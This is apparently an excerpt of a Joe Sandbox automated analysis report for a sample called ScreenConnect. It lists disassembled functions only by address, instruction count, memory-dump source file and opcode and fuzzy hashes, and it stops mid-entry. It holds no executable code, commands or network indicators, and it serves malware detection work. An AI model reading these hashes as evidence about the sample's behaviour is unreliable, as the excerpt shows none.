                                                                                                                                                                                                                                          • Instruction ID: 5f7c6c686ef1f43e80a3294d37d2721b0759f2b58df190c5fcf039a3bcc1ea09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f7d2ea999be138ec0bdbb182d9364163ad7961fe3b9b4e5c8a72ac1f0f36b8a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91314F706007018FC778DF29D884966BBF2EF89320B144A2CE456DB7A5D730E946CB91
                                                                                                                                                                                                                                          Function 011750C3 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 51f4dfd14bfc38177cbd5305c6af28ca01c89936789e1c528ef9ec53478d0811
                                                                                                                                                                                                                                          • Instruction ID: cdb1d1b52174816cd730a07b98ac32f63c170c121e77f821b48b9d6b87d90945
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51f4dfd14bfc38177cbd5305c6af28ca01c89936789e1c528ef9ec53478d0811
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1421D2707002115FC708EB68E990B6EBBE6EFC5220F048965D515EB358DF70AD09C7D5
                                                                                                                                                                                                                                          Function 01175648 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 54e7b5bcbffa1c8e787b55e69b6292753471b311edbc19d845b1128fe5fa830f
                                                                                                                                                                                                                                          • Instruction ID: 30ecb9dc27ad6f0e85925e32b8f71076e17940d45e5c7cbfa2d73ceb0e8a7b65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e7b5bcbffa1c8e787b55e69b6292753471b311edbc19d845b1128fe5fa830f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00219071E002049FEB69DF69E8009EEBBB3AFC4311F08847AE555DB2A4D7719A05CB91
                                                                                                                                                                                                                                          Function 01174B70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4b3fbd7736a0268a5d2899c079ee05eb478f32319e5374735829772d0986862c
                                                                                                                                                                                                                                          • Instruction ID: e03877119deb92a5406e1af34684be8fd75df86330943faaa88afa274f136721
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b3fbd7736a0268a5d2899c079ee05eb478f32319e5374735829772d0986862c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D2131302006058FD738CF29D948696BBF5EF48310B108B2DD5A297AA5DB31E989CF80
                                                                                                                                                                                                                                          Function 011750D0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 486a5c5f8fe1eb9dce681f0589beafdb630256ca1be2a8c97bb0f01948c2ee5d
                                                                                                                                                                                                                                          • Instruction ID: c2d7ab796a2a2487cebf97bd813219a2f4b222c782c234384b6e00129b0e7472
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 486a5c5f8fe1eb9dce681f0589beafdb630256ca1be2a8c97bb0f01948c2ee5d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B11D070B002115BC708EB68E950B6EFBA6EFC4220F008929D919AB358DF70AD0987D5
                                                                                                                                                                                                                                          Function 01175198 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9674a1886499bfaaf8bad70ae0f393292a53ef6466e966d708a2cf5abcf7da9b
                                                                                                                                                                                                                                          • Instruction ID: d60f813e848d9d8c61cce4015d50f0711a1322cacdc0cf2653b5ade1ccc48326
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9674a1886499bfaaf8bad70ae0f393292a53ef6466e966d708a2cf5abcf7da9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 521104327012548FC714CB6CE88099EBBBAEFC5360B148676E405CB369DB71DD46C7A0
                                                                                                                                                                                                                                          Function 01174F40 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: df8d49d1237fbb3199cdbc087b8cc5588ae34d25adcf8194111b4017ec82acfa
                                                                                                                                                                                                                                          • Instruction ID: 8af0f2abe7f1cee3187ad80bf54e730d6bc2e4c05e7b15fa6e1f3ca4cca3ad94
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df8d49d1237fbb3199cdbc087b8cc5588ae34d25adcf8194111b4017ec82acfa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05114231A4021A9FCF40DFA8C9409DEFBB1FF49314B108166D608BB265E771AA1ACBD0
                                                                                                                                                                                                                                          Function 01175658 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 639464cafbf3ac81cea052e61611f7f41ab9d0b121d8ce2d7924c07a0d0c4f88
                                                                                                                                                                                                                                          • Instruction ID: 9bff05013688416380a4d673ca01b41d4c18f7933d5e89d3334aec8c98172189
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 639464cafbf3ac81cea052e61611f7f41ab9d0b121d8ce2d7924c07a0d0c4f88
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F611AD70F00205AFDB59DE6DD800AABBBBBEFC4310F14C46AE554D72A4E7729A01CB91
                                                                                                                                                                                                                                          Function 01175035 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 43322c0bd929e37ca3f04341dd5abfef945e8a03c4cf59df74ad01c19bfd045d
                                                                                                                                                                                                                                          • Instruction ID: 22655b00145748fd4e5e49458e405988905044147e58860fa9320587b3bc755c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43322c0bd929e37ca3f04341dd5abfef945e8a03c4cf59df74ad01c19bfd045d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B11493154000ADBCB4ADFA8D5848DCBFB3EF80314B55C555D005AB229D732E94ACBA1
                                                                                                                                                                                                                                          Function 01176E59 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5fbe7e14ff6ad7f92dc2cf623359dcb0f744760e8b3b3458f12515b2ccdb61be
                                                                                                                                                                                                                                          • Instruction ID: 962666b92ca31e7c1a22ec1b70b46c49392e260c80c21e1d42d8e4380487d679
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fbe7e14ff6ad7f92dc2cf623359dcb0f744760e8b3b3458f12515b2ccdb61be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9801F572B007225BC7098F59D80455BFBE9EBC42207104A7AD815DB355DFB1DC01C7D4
                                                                                                                                                                                                                                          Function 01171247 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e517defdfb00b397dc68ac687aae2adaacc60c980292e45b8155e57ab128ab98
                                                                                                                                                                                                                                          • Instruction ID: f0b4504cb63024d933566091bc5560aa4adb558590563632011a7ef1864970c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e517defdfb00b397dc68ac687aae2adaacc60c980292e45b8155e57ab128ab98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44014C766082906FC71FA77CA45059A3F78EE8A1A035484AED485CB31AEB60DD0AC7C0
                                                                                                                                                                                                                                          Function 01174F50 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 80bb042867a213c587460d0ccecb073a9494811af92b48a607f3ae9071e841a2
                                                                                                                                                                                                                                          • Instruction ID: 5c96180d32744668d89f95fab40d1d9414837bc5fd99c0a065529b579273b457
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80bb042867a213c587460d0ccecb073a9494811af92b48a607f3ae9071e841a2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A811563590020A9FCF04DFA8C9409DEBBF5FF49314B108166D604BB264D771AA16CBD0
                                                                                                                                                                                                                                          Function 0111D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2522146462.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_111d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1132c9fa55c2195b91ad833daa20313fc0e7860fb28ca2b0fa9a36fc2c2290da
                                                                                                                                                                                                                                          • Instruction ID: b357def58caab9e2ed8e40328f37d6d9945dc6d4183bedbcfd7d720cfc8efbf5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1132c9fa55c2195b91ad833daa20313fc0e7860fb28ca2b0fa9a36fc2c2290da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB012B314043409EEB288A5DDC88B67FF9CEF453A4F18C43AED490F28AC3799841C6B1
                                                                                                                                                                                                                                          Function 01174FD3 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b0012aeafc725b973ff09c0ecb2a0a55112a1eb0b6f24e0d75aba78eaec25134
                                                                                                                                                                                                                                          • Instruction ID: 5fe8b57672652acd2ac004157167bdcf7c4620d3516040b5f2658fc389dca5ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0012aeafc725b973ff09c0ecb2a0a55112a1eb0b6f24e0d75aba78eaec25134
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A01DE31A0015ADBCB09CFA8D8048CDFFB2EF89320F04856AD505BB264DB316947CB90
                                                                                                                                                                                                                                          Function 01173608 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ff0497499d6f2b70024cf4f802df60d7cb9eec642e2ddb77b9290c43bb170824
                                                                                                                                                                                                                                          • Instruction ID: 0856c796d99d1d0b9f4ac9060324c46d8b125d00943a8cb297f731612f348c64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff0497499d6f2b70024cf4f802df60d7cb9eec642e2ddb77b9290c43bb170824
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF024322047508FC7269B1DEC4009AFBB8EEC12347144ABAE09AC7352D330E90BC3C1
                                                                                                                                                                                                                                          Function 01178168 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8a25b354da60b26bf43bec38ccf76af0595f98ad9db737bbc09d05db7147ba39
                                                                                                                                                                                                                                          • Instruction ID: 65313ae22b2fe980c3b476b583175f283c6f5ca5873a314ca3b8a52bedb9a4cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a25b354da60b26bf43bec38ccf76af0595f98ad9db737bbc09d05db7147ba39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3F08C77B0C2146FD728CABEA40069BBBEECBC4224B14C07FE54DC3780E935A4018764
                                                                                                                                                                                                                                          Function 011712A0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 58c5762e08272e2cfed2e02a6cf3262135b65723db47e793a3be0217e12e49ab
                                                                                                                                                                                                                                          • Instruction ID: 89a71258774c716831fcf87b0983f403961551a93a987bc843c6af25f9f117d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58c5762e08272e2cfed2e02a6cf3262135b65723db47e793a3be0217e12e49ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F0F6312003509FC75EAB6CA55055E7BF5EFC6250711812ED556D7355EB30DC058B80
                                                                                                                                                                                                                                          Function 0111D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2522146462.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_111d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 71bc0e289b51f367b341501383f19cbfcadafec7226eb539b52550527cd3852a
                                                                                                                                                                                                                                          • Instruction ID: 0dc2c039d33786db4538b9e9f65e622f79f76ada74ab87a36ca3ccac803803be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71bc0e289b51f367b341501383f19cbfcadafec7226eb539b52550527cd3852a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0C8714043449EEB158A19DC88762FF98EF41264F18C46AED480E286C3795845CAB0
                                                                                                                                                                                                                                          Function 01178157 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: da17a4d3a2c56e06cf37425df06aabb5ec9b5eff6d09b54f650e4d993974fa8f
                                                                                                                                                                                                                                          • Instruction ID: ca45212ae050d4bbae10205cc1d3f48168a754db634ff3515928a775437d40f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da17a4d3a2c56e06cf37425df06aabb5ec9b5eff6d09b54f650e4d993974fa8f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F0EC72A0C384AFC715CBBA58505977FED8F86214B0480BFD54DC3241F5249506C735
                                                                                                                                                                                                                                          Function 01176EE8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7a1eb9ecdae960d9299a95b147a746dc787a67e5f77c2293eb1aeef62a3b80dc
                                                                                                                                                                                                                                          • Instruction ID: 340774f6a12b60f5255640dddc884769ddc675a077c7e020633c2504a5900c51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a1eb9ecdae960d9299a95b147a746dc787a67e5f77c2293eb1aeef62a3b80dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF05C713013505BC7090FAA788812AFFEAFFC6234740417AE249D7395CF704C4583A0
                                                                                                                                                                                                                                          Function 01171414 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 62341034eb227b50c6b062c30fdd838a2aa7efc5d90416a78c7d0c76e0bb4cc9
                                                                                                                                                                                                                                          • Instruction ID: 5eaccfe1e1b3990fac931ad7bf92d14fd5705c51eb7ccf51b34aefa06cca34a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62341034eb227b50c6b062c30fdd838a2aa7efc5d90416a78c7d0c76e0bb4cc9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40F02B7200C2908FD31A9778AC117997FB5EF93220B4905DAD081CF16AD75CA509C351
                                                                                                                                                                                                                                          Function 01175F69 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 337041529e056bd4d079c1b7eeae23c4a52e3d3b1137913e4eac0bcda9c0b3ef
                                                                                                                                                                                                                                          • Instruction ID: eabe1cfe733481c57b901cc7b3368beb3e5f516de32184f6da2bce80bae51ba1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 337041529e056bd4d079c1b7eeae23c4a52e3d3b1137913e4eac0bcda9c0b3ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4F0E532B019924FCB59462C98442A4BBF68B47265F2D82B1F416CF342F731CC828783
                                                                                                                                                                                                                                          Function 011712B0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 55135d960db299c9dfe90aebbd0488e9f9f0d3ce2cecdbc5c4168f2cac838624
                                                                                                                                                                                                                                          • Instruction ID: a13444113d15a8704df8863391b013df8958b1ade22595333e19abeef2a64b42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55135d960db299c9dfe90aebbd0488e9f9f0d3ce2cecdbc5c4168f2cac838624
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0A0353002505B831AA65DA55095E7BA9EBC8660310842DD45AD7308DF30EC059BD0
                                                                                                                                                                                                                                          Function 01171DA0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 11a9e9260ebe664f8092d9300e99c2bf5f96a0e97ad7d1665fb9e89d68cde1fc
                                                                                                                                                                                                                                          • Instruction ID: b4b32fb5bf6eeb1042f01a3772a9bac9b43249e7d5de82d1d42c0c773da7bd11
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11a9e9260ebe664f8092d9300e99c2bf5f96a0e97ad7d1665fb9e89d68cde1fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE06D32B10310AFC3695F3CA4185AE7BA6AFEA2713214177E956C3399CF348D52CB91
                                                                                                                                                                                                                                          Function 01176EF8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27953f31bbfb98c73a9c318331abcff17cb7c2204bd4b702beda3adf11092af9
                                                                                                                                                                                                                                          • Instruction ID: 5ff79e7c5e3594f731b10b08a18953144f4f522a724834ee58022e924977f916
